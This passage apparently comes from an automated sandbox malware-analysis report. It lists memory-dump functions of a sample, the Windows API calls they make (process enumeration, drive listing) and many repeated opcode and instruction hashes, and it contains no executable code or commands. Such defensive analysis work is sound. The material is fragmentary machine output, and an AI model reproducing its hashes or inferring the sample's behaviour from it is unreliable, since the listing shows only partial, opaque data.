                                                            • Instruction ID: 7fc56a1ba40181848014812dbc40ca881b3666d6cbffbc6263d8811f6a887ce1
                                                            • Opcode Fuzzy Hash: 822c048a8b797ec702bb63da9545dec047603deba909f310ec6f08ddf002825c
                                                            • Instruction Fuzzy Hash: 4041D6A714C311BEB3D381815B58BFA676EE5E6370730A462A403DB5C2E3D84ACA41F5
                                                            Function 06E001E5 Relevance: 1.7, APIs: 1, Instructions: 167COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Process32FirstW.KERNEL32(695E6103,695E6103,695E6103,695E6103), ref: 06E00369
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714409535.0000000006E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e00000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            • Opcode ID: 158b431388ffe207297c9f733a928b64c74a7a8d47d790d86b52611969b6e57e
                                                            • Instruction ID: 7307ce05024258920f127e8b117cc871e2fc5a81aff2cebe46440885812dda14
                                                            • Opcode Fuzzy Hash: 158b431388ffe207297c9f733a928b64c74a7a8d47d790d86b52611969b6e57e
                                                            • Instruction Fuzzy Hash: 103118E314C312BEB3D381905B58BF6276ED6E7370730A462A407DB6C2D7980ACA41F5
                                                            Function 06E001D9 Relevance: 1.7, APIs: 1, Instructions: 167COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Process32FirstW.KERNEL32(695E6103,695E6103,695E6103,695E6103), ref: 06E00369
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714409535.0000000006E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e00000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            • Opcode ID: 7e779c43d03633716510bd6413d693dd82004c6544902f237e6d173dcfca2e44
                                                            • Instruction ID: 0c61b403e8e3ae168c387fb2547fd884cd710049c17328ba2c0d7e73ec63dd68
                                                            • Opcode Fuzzy Hash: 7e779c43d03633716510bd6413d693dd82004c6544902f237e6d173dcfca2e44
                                                            • Instruction Fuzzy Hash: 47311AA714C322BEB3D385505B58FFA176ED6E7370730A462A403DB6C2D7980ACA41F4
                                                            Function 06E00219 Relevance: 1.7, APIs: 1, Instructions: 162COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Process32FirstW.KERNEL32(695E6103,695E6103,695E6103,695E6103), ref: 06E00369
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714409535.0000000006E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e00000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            • Opcode ID: c17d6978a0a30d410962291784b308911e4c183b8d3052f32d36fd9baa52eb1d
                                                            • Instruction ID: 251ea13cba35646642a1bfdb064fffa08f6238fae044a2f5d147409cb6d87b31
                                                            • Opcode Fuzzy Hash: c17d6978a0a30d410962291784b308911e4c183b8d3052f32d36fd9baa52eb1d
                                                            • Instruction Fuzzy Hash: D6314CA314C322BEB3D384505B58BFA676EE6E63707306471B403DB9C2D3984AC641F4
                                                            Function 06E00201 Relevance: 1.7, APIs: 1, Instructions: 158COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Process32FirstW.KERNEL32(695E6103,695E6103,695E6103,695E6103), ref: 06E00369
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714409535.0000000006E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e00000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            • Opcode ID: e2a3f0824bf3c82c99198e1c8689cd3844e5bcad2327e48c3458696adf4eb3c1
                                                            • Instruction ID: 8ea4337a101c7671328a657a5178b1fde32311af44664b0b0e8ad7d38427868a
                                                            • Opcode Fuzzy Hash: e2a3f0824bf3c82c99198e1c8689cd3844e5bcad2327e48c3458696adf4eb3c1
                                                            • Instruction Fuzzy Hash: 44313BA314C322BEB3D385515B58BFA676EE6E73707306065B403DB9C2D3984AC641F4
                                                            Function 06E00234 Relevance: 1.6, APIs: 1, Instructions: 149COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Process32FirstW.KERNEL32(695E6103,695E6103,695E6103,695E6103), ref: 06E00369
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714409535.0000000006E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e00000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            • Opcode ID: bfdc0bcf9bf02e5c5a7496349488e53b23f0a084712b79865c0ec20ea4430e5c
                                                            • Instruction ID: de8390168bbb618c817e38b0b52c0689254ab1af4f8268b1fd2c28d14ba3ca05
                                                            • Opcode Fuzzy Hash: bfdc0bcf9bf02e5c5a7496349488e53b23f0a084712b79865c0ec20ea4430e5c
                                                            • Instruction Fuzzy Hash: 4A315BA304C311BEB3D381515B68BF6272EE2EB370730A462A407DB9C2D3984ACA40F4
                                                            Function 06E00240 Relevance: 1.6, APIs: 1, Instructions: 145COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Process32FirstW.KERNEL32(695E6103,695E6103,695E6103,695E6103), ref: 06E00369
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714409535.0000000006E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e00000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            • Opcode ID: f8b72fe2cbb68ee3714f461d1987ebc71b983d284ad3cecfefe9cd3b12c149b8
                                                            • Instruction ID: 2689acd4a65501a5e0d1ff9eb468d4a76d92000cd67c179430f093ef5caa982d
                                                            • Opcode Fuzzy Hash: f8b72fe2cbb68ee3714f461d1987ebc71b983d284ad3cecfefe9cd3b12c149b8
                                                            • Instruction Fuzzy Hash: 7D313C9314C322BEB3D380555B58FFA172EE2E7370730A462A403DB5C2D3984ACA41F4
                                                            Function 06E0025D Relevance: 1.6, APIs: 1, Instructions: 135COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Process32FirstW.KERNEL32(695E6103,695E6103,695E6103,695E6103), ref: 06E00369
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714409535.0000000006E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e00000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            • Opcode ID: e47edfa2dfc533180f1c83b394fb7d32b23b9e0daba2377d0bf655faae361cde
                                                            • Instruction ID: d70d12d54642491d01c428adae1ba268dc9fbefff04197a3b13e5b9f1118bf37
                                                            • Opcode Fuzzy Hash: e47edfa2dfc533180f1c83b394fb7d32b23b9e0daba2377d0bf655faae361cde
                                                            • Instruction Fuzzy Hash: BA21F99314C312BEB3C385955B68BF6172EE2EB370730A561A403DB5C2E3980ACA51F4
                                                            Function 06DA07B5 Relevance: 1.6, Strings: 1, Instructions: 384COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714206115.0000000006DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6da0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PR
                                                            • API String ID: 0-2421912052
                                                            • Opcode ID: dbd0e94f61ede1e1f7e27f41d41accd590db7e377021a18e3321366d510447ad
                                                            • Instruction ID: 9d54abdedfd72c445334205582a8d9d158e25772e2cce1bb6ab4285824fd1d4f
                                                            • Opcode Fuzzy Hash: dbd0e94f61ede1e1f7e27f41d41accd590db7e377021a18e3321366d510447ad
                                                            • Instruction Fuzzy Hash: B08100F740C310BEF78296915B44BFA6B7EEBD7339B308426F487A5502E298CA4951F1
                                                            Function 06E00308 Relevance: 1.6, APIs: 1, Instructions: 121COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Process32FirstW.KERNEL32(695E6103,695E6103,695E6103,695E6103), ref: 06E00369
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714409535.0000000006E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e00000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            • Opcode ID: a1175a62ea8b87f9452cc24217dafe805980f17d3e394dc35dcff809e4772571
                                                            • Instruction ID: 44cb0027b5477ba94fa6dfed7e862c8fec6d4fc6acf3c7deb915e0018b0b88b8
                                                            • Opcode Fuzzy Hash: a1175a62ea8b87f9452cc24217dafe805980f17d3e394dc35dcff809e4772571
                                                            • Instruction Fuzzy Hash: 3E217B9214C312BFB3C380601A68FF61B2AD5AB671320B562E443DB9C2D24C0ACB41E5
                                                            Function 06E00284 Relevance: 1.6, APIs: 1, Instructions: 120COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Process32FirstW.KERNEL32(695E6103,695E6103,695E6103,695E6103), ref: 06E00369
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714409535.0000000006E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e00000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            • Opcode ID: 9b6d6bbdaa9da65c8941181bbb397ba28a23a4589e115f5981a178261049440d
                                                            • Instruction ID: c7ab5710b3a5e30c25b6ab9e2e0920320bdbabdae133c876cfce075d744976c5
                                                            • Opcode Fuzzy Hash: 9b6d6bbdaa9da65c8941181bbb397ba28a23a4589e115f5981a178261049440d
                                                            • Instruction Fuzzy Hash: E0213B9214C312BFB3D381549A58FF6276EA2AB330730B161A407DB5C2D3AC0AC641E5
                                                            Function 06E002A8 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Process32FirstW.KERNEL32(695E6103,695E6103,695E6103,695E6103), ref: 06E00369
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714409535.0000000006E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e00000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            • Opcode ID: afede250a4602b5211f9818c7e9a9da45ba3d62407300e995022e47bc8c8dcfe
                                                            • Instruction ID: 27db281b9d65e4df1c861c39a5e73eb61dd93124c99c3211c87e1ce7c611856e
                                                            • Opcode Fuzzy Hash: afede250a4602b5211f9818c7e9a9da45ba3d62407300e995022e47bc8c8dcfe
                                                            • Instruction Fuzzy Hash: 7C21299214C322BEB3C381545A68FF6276EE2AB331730B521A407DB5C2D7984AC640E5
                                                            Function 06E002BC Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Process32FirstW.KERNEL32(695E6103,695E6103,695E6103,695E6103), ref: 06E00369
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714409535.0000000006E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e00000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            • Opcode ID: 5d7501d59a669de6335d99b3773881b27c903daeaf62760d031b1bcde588d74d
                                                            • Instruction ID: b513543a2862109e0abbbe4d53ec68d0f0d691ea424f7931d051b3b5756610df
                                                            • Opcode Fuzzy Hash: 5d7501d59a669de6335d99b3773881b27c903daeaf62760d031b1bcde588d74d
                                                            • Instruction Fuzzy Hash: A821279214C312BEB3D380545A58FF61B2E91EB370330B622A457DB6C2D29C4AC700E5
                                                            Function 06E002CF Relevance: 1.6, APIs: 1, Instructions: 106COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Process32FirstW.KERNEL32(695E6103,695E6103,695E6103,695E6103), ref: 06E00369
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714409535.0000000006E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e00000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            • Opcode ID: 6ffe8281ec91c29748aa16ba184d1d89c6c8e2a1ba7462ffdf07c29717358aef
                                                            • Instruction ID: d1703009033d32b9b389dbb4a30cc14c1fc03198d91619407f51301ce2da9b16
                                                            • Opcode Fuzzy Hash: 6ffe8281ec91c29748aa16ba184d1d89c6c8e2a1ba7462ffdf07c29717358aef
                                                            • Instruction Fuzzy Hash: 1C11069614C312BEB3C394955B68FFB172EE5FB770370B522A407DB5C2E2984AC610E9
                                                            Function 06E002E3 Relevance: 1.6, APIs: 1, Instructions: 102COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Process32FirstW.KERNEL32(695E6103,695E6103,695E6103,695E6103), ref: 06E00369
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714409535.0000000006E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e00000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            • Opcode ID: ff88efdf48cb64400627351720820dfd23a0fb0a2fc87c354a6a6f9e4632fcc2
                                                            • Instruction ID: b04841d865d6252fe588b2a24f9b6d65b5502a141903869feb46c6f609ad2d01
                                                            • Opcode Fuzzy Hash: ff88efdf48cb64400627351720820dfd23a0fb0a2fc87c354a6a6f9e4632fcc2
                                                            • Instruction Fuzzy Hash: 8B11229218C312BEB3C391915B68FF6172EA5EB370330B522A407DB5C2D29C4ACA10F9
                                                            Function 06E002F2 Relevance: 1.6, APIs: 1, Instructions: 101COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Process32FirstW.KERNEL32(695E6103,695E6103,695E6103,695E6103), ref: 06E00369
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714409535.0000000006E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e00000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            • Opcode ID: 1ffa4908ff1255f4cdfb5427b17ba904dc2b148f11fc8d91e3f5b65b6ca09cea
                                                            • Instruction ID: fdca5e4181b634f6f3ccbbf5be8d16473de65e15f3e1883e961ec475f4391b9e
                                                            • Opcode Fuzzy Hash: 1ffa4908ff1255f4cdfb5427b17ba904dc2b148f11fc8d91e3f5b65b6ca09cea
                                                            • Instruction Fuzzy Hash: 2B11D09614C312BEB3D395945A68FF6172EA2EA370370B521A407DB5C1D2984AC641E9
                                                            Function 06DB0CC9 Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06DB0D67
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714236326.0000000006DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6db0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID:
                                                            • API String ID: 999431828-0
                                                            • Opcode ID: 5ce42e8c698837e21ac446cafc47cc50e78c69bab71900a6859ba30d2f27d190
                                                            • Instruction ID: 4f9d2e2c1deb7e2f441b17ca718da3519ec596988cda1bf4ce9f037b00e906ee
                                                            • Opcode Fuzzy Hash: 5ce42e8c698837e21ac446cafc47cc50e78c69bab71900a6859ba30d2f27d190
                                                            • Instruction Fuzzy Hash: E21136EB948222FE738351653B14AFFAB7EE4C3230330A43AF043C294AE6D45A0D6171
                                                            Function 06DB0CFD Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06DB0D67
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714236326.0000000006DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6db0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID:
                                                            • API String ID: 999431828-0
                                                            • Opcode ID: a211d0149be2a4a502bf0cfc1939c1f766173058b2cb162743b0de72d5569768
                                                            • Instruction ID: af9e0f2c59f46ab4c295bc4a62df3e53d6e2ba6c72661bf27fcd01f310965d95
                                                            • Opcode Fuzzy Hash: a211d0149be2a4a502bf0cfc1939c1f766173058b2cb162743b0de72d5569768
                                                            • Instruction Fuzzy Hash: 161157FB54C251AEF38256A46E14AFBAB7DD9C3230334983AF043C258BE6D015099531
                                                            Function 06DA0808 Relevance: 1.6, Strings: 1, Instructions: 342COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714206115.0000000006DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6da0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PR
                                                            • API String ID: 0-2421912052
                                                            • Opcode ID: e79754b3803a126567c52facd0cbd744b2a0df7d587e753a8e6e93e6d063e84a
                                                            • Instruction ID: cd0820f95aff9fd2a146355fa3d69a590431867edb288ac31f54c1c895815229
                                                            • Opcode Fuzzy Hash: e79754b3803a126567c52facd0cbd744b2a0df7d587e753a8e6e93e6d063e84a
                                                            • Instruction Fuzzy Hash: DF71F2F740C310FEB7C295915B40AFA6B7EAB9B33CB308526F487A5502E294CB4941F1
                                                            Function 06DB0CDF Relevance: 1.6, APIs: 1, Instructions: 92COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06DB0D67
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714236326.0000000006DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6db0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID:
                                                            • API String ID: 999431828-0
                                                            • Opcode ID: 9e84ebf7834165b6ed360fbd11cdb426acdeaa81be525d39d286392d283cd496
                                                            • Instruction ID: 90a06852bab3838555a98c5da3aab3ce8eaaa9bb3805c84926dbd69dfa75b3bb
                                                            • Opcode Fuzzy Hash: 9e84ebf7834165b6ed360fbd11cdb426acdeaa81be525d39d286392d283cd496
                                                            • Instruction Fuzzy Hash: B91148EB948212FD738255653B14AFB6A7EE4C3670370A43AF043C3E4AE6E45A0D6171
                                                            Function 06E0033B Relevance: 1.6, APIs: 1, Instructions: 90COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Process32FirstW.KERNEL32(695E6103,695E6103,695E6103,695E6103), ref: 06E00369
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714409535.0000000006E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e00000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            • Opcode ID: ebe8a58e82b061f1fed826a95a3af6d7a6a534815d956e3c567aa5bd2890904c
                                                            • Instruction ID: 2751149352ebe2f11bb488ff3385adb51595eb910354b984b95ad67938870dd6
                                                            • Opcode Fuzzy Hash: ebe8a58e82b061f1fed826a95a3af6d7a6a534815d956e3c567aa5bd2890904c
                                                            • Instruction Fuzzy Hash: 52113AA314C312BFB3D3A5654B68BFA276BA5FB370370B521A403CB5C2D39846C650E5
                                                            Function 06DB0CE4 Relevance: 1.6, APIs: 1, Instructions: 90COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06DB0D67
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714236326.0000000006DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6db0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID:
                                                            • API String ID: 999431828-0
                                                            • Opcode ID: ff4f72b8f4ad1a4ae1ff22a3b99fc00d1eb6a58a338f9786ac284ac00b0a485d
                                                            • Instruction ID: 9e101036c147d21ee87fea3a68a7d2e7fb101ae5180bf3fcc3159d058ce53a73
                                                            • Opcode Fuzzy Hash: ff4f72b8f4ad1a4ae1ff22a3b99fc00d1eb6a58a338f9786ac284ac00b0a485d
                                                            • Instruction Fuzzy Hash: E21148EB548212FDB38356653B14AFBAB7EE4C3630334A83AF043C2D4AE7D45A096571
                                                            Function 06E0035B Relevance: 1.6, APIs: 1, Instructions: 89COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Process32FirstW.KERNEL32(695E6103,695E6103,695E6103,695E6103), ref: 06E00369
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714409535.0000000006E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e00000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            • Opcode ID: d212d67e56e40a577138445436a74ff17a2ca85b96a97e297c21e37dd1e7dad0
                                                            • Instruction ID: 3123a40723e2c186ca9b69bf1bbbdb6fdc284bda01f6b97b97d0a53ae4a9a530
                                                            • Opcode Fuzzy Hash: d212d67e56e40a577138445436a74ff17a2ca85b96a97e297c21e37dd1e7dad0
                                                            • Instruction Fuzzy Hash: 7F112B9210C7127FB3C391645B68BF7271EE6FA331720A526A403DBAC2D6884AC751E5
                                                            Function 06DA0811 Relevance: 1.6, Strings: 1, Instructions: 338COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714206115.0000000006DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6da0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PR
                                                            • API String ID: 0-2421912052
                                                            • Opcode ID: 70025b859c9cae9f788f1cd6d60c1a742652f5bc7ab6ce863be00211200b9014
                                                            • Instruction ID: 2863ab5980e234059beda53126eb626610dc5409c7bcf6a6d2aca904dbc57074
                                                            • Opcode Fuzzy Hash: 70025b859c9cae9f788f1cd6d60c1a742652f5bc7ab6ce863be00211200b9014
                                                            • Instruction Fuzzy Hash: B071F2F740C310FDB7C296915B40AFA6B7EEB9B33CB308526F487A5502E298CA4941F1
                                                            Function 06DA0823 Relevance: 1.6, Strings: 1, Instructions: 338COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714206115.0000000006DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6da0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PR
                                                            • API String ID: 0-2421912052
                                                            • Opcode ID: 3dfb63f99af6c4176532d4024d959cfe4a20311df9fa5544b165259eaa52445c
                                                            • Instruction ID: a3a3d6668a967a4e75003150c24ed516db634f43d3c4d836eba1a36137a9e5fb
                                                            • Opcode Fuzzy Hash: 3dfb63f99af6c4176532d4024d959cfe4a20311df9fa5544b165259eaa52445c
                                                            • Instruction Fuzzy Hash: A971E1F744C310FEB7C295915B40AFA6B7EAB9B33DB308426F487A5602E294CA4951F1
                                                            Function 06DA083B Relevance: 1.6, Strings: 1, Instructions: 337COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714206115.0000000006DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6da0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PR
                                                            • API String ID: 0-2421912052
                                                            • Opcode ID: 737d05b4bd64c302879086ea84e3ca4f045610577183eb8d9d21a8963d0265f3
                                                            • Instruction ID: 4dfe4f39748e1b078080860f493a351f32e1b1991a0d539fa012e8a64481e144
                                                            • Opcode Fuzzy Hash: 737d05b4bd64c302879086ea84e3ca4f045610577183eb8d9d21a8963d0265f3
                                                            • Instruction Fuzzy Hash: 927104F740C310FDB7C295955B40AFA6B7EAB9B33CB308526F487A5502E294CB4941F1
                                                            Function 06E00351 Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Process32FirstW.KERNEL32(695E6103,695E6103,695E6103,695E6103), ref: 06E00369
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714409535.0000000006E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e00000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            • Opcode ID: 06e4f7fddca81410893c9bc1845c7a391bd42973ea4ac4950979ea0c3ae65ff5
                                                            • Instruction ID: 41a7b0267d9a212a5b8cd75da5430b51181f081a2463f2eb9afb0593cca84853
                                                            • Opcode Fuzzy Hash: 06e4f7fddca81410893c9bc1845c7a391bd42973ea4ac4950979ea0c3ae65ff5
                                                            • Instruction Fuzzy Hash: 6001489214C312BEB3D391944B68BF6172BE2FB330330F521A403DB6C1D6880ACB10E9
                                                            Function 06DA0862 Relevance: 1.6, Strings: 1, Instructions: 328COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714206115.0000000006DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6da0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PR
                                                            • API String ID: 0-2421912052
                                                            • Opcode ID: 7545eb451a24298842d8525b236bd7e817833c992e30a8ca58ea87928129a3d4
                                                            • Instruction ID: ed1db73a5336282a73367bd642afd6c44a87107011a8493e93f83706fbda6dfa
                                                            • Opcode Fuzzy Hash: 7545eb451a24298842d8525b236bd7e817833c992e30a8ca58ea87928129a3d4
                                                            • Instruction Fuzzy Hash: D371F5F750C311FEB7C295915B40AFA6B7EEA9B33CB308526F48795502E294CA4941F1
                                                            Function 06DB0D92 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06DB0D67
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714236326.0000000006DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6db0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID:
                                                            • API String ID: 999431828-0
                                                            • Opcode ID: 67ff2448c7ee2d7a107e879ce5ae87ccbca878de490dd96dce0aa4fa4a4252eb
